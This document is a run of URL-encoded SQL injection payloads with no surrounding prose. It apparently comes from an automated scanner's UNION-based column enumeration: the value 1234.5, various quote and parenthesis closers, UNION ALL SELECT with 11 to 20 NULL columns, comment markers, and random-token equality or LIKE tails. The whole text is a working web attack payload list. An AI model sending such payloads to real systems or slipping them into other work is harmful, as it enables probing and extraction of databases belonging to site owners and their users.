1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27bzaW%27%3D%27bzaW 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27YlAe%27%3D%27YlAe 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27hLSH%27%3D%27hLSH 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27KXjU%27%3D%27KXjU 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27tZHY%27%3D%27tZHY 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27LvXu%27%3D%27LvXu 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27WHrJ%27%3D%27WHrJ 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27cDAs%27%3D%27cDAs 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27AqtJ%27%3D%27AqtJ 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27ChJj%27%3D%27ChJj 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27KWPf%27%3D%27KWPf 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27kyPG%27%3D%27kyPG 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27CJRJ%27%3D%27CJRJ 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27DQXc%27%3D%27DQXc 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27oFOV%27%3D%27oFOV 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27pWFz%27%3D%27pWFz 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27chlC%27%3D%27chlC 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27PKao%27%3D%27PKao 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27CnaX%27%3D%27CnaX 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27DlNh%27%3D%27DlNh 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27UKtU%27%3D%27UKtU 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27OmEd%27%3D%27OmEd 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27zDqC%27%3D%27zDqC 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27tuDq%27%3D%27tuDq 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27BFFD%27%3D%27BFFD 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27cMps%27%3D%27cMps 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27welS%27%3D%27welS 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27DQDM%27%3D%27DQDM 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27uqQT%27%3D%27uqQT 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27MiWk%27%3D%27MiWk 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27ADGN%27%3D%27ADGN 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27kYNR%27%3D%27kYNR 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27Hvpy%27%3D%27Hvpy 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27aDRJ%27%3D%27aDRJ 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27Rhzt%27%20LIKE%20%27Rhzt 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27obXf%27%20LIKE%20%27obXf 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27IXBM%27%20LIKE%20%27IXBM 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27vAiI%27%20LIKE%20%27vAiI 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27DLRD%27%20LIKE%20%27DLRD 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27yebk%27%20LIKE%20%27yebk 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27SjQc%27%20LIKE%20%27SjQc 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27Piev%27%20LIKE%20%27Piev 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27mwTH%27%20LIKE%20%27mwTH 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27ePtN%27%20LIKE%20%27ePtN 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27ddGx%27%20LIKE%20%27ddGx 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27GPcO%27%20LIKE%20%27GPcO 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27yeBo%27%20LIKE%20%27yeBo 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27lIIe%27%20LIKE%20%27lIIe 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27CuvL%27%20LIKE%20%27CuvL 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27gWjX%27%20LIKE%20%27gWjX 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27QYYs%27%20LIKE%20%27QYYs 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27XrEr%27%20LIKE%20%27XrEr 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27QiaB%27%20LIKE%20%27QiaB 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27meVF%27%20LIKE%20%27meVF 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27bCng%27%20LIKE%20%27bCng 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27Sijw%27%20LIKE%20%27Sijw 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27CXSD%27%20LIKE%20%27CXSD 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27eKUe%27%20LIKE%20%27eKUe 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27RcHy%27%20LIKE%20%27RcHy 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27cVnh%27%20LIKE%20%27cVnh 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27pUWk%27%20LIKE%20%27pUWk 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27fLoU%27%20LIKE%20%27fLoU 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27Uymj%27%20LIKE%20%27Uymj 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27PJqq%27%20LIKE%20%27PJqq 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27fYSr%27%20LIKE%20%27fYSr 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27aCSI%27%20LIKE%20%27aCSI 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27ZpZT%27%20LIKE%20%27ZpZT 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27mTMD%27%20LIKE%20%27mTMD 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27ljKF%27%20LIKE%20%27ljKF 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27DwYA%27%20LIKE%20%27DwYA 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27VemI%27%20LIKE%20%27VemI 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27apBG%27%20LIKE%20%27apBG 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27zZmW%27%20LIKE%20%27zZmW 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27dhFn%27%20LIKE%20%27dhFn 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22eKQs%22%3D%22eKQs 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22hnfL%22%3D%22hnfL 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22sppK%22%3D%22sppK 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22exqb%22%3D%22exqb 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22IiNd%22%3D%22IiNd 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22uQkW%22%3D%22uQkW 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22giij%22%3D%22giij 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22oHce%22%3D%22oHce 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22qkks%22%3D%22qkks 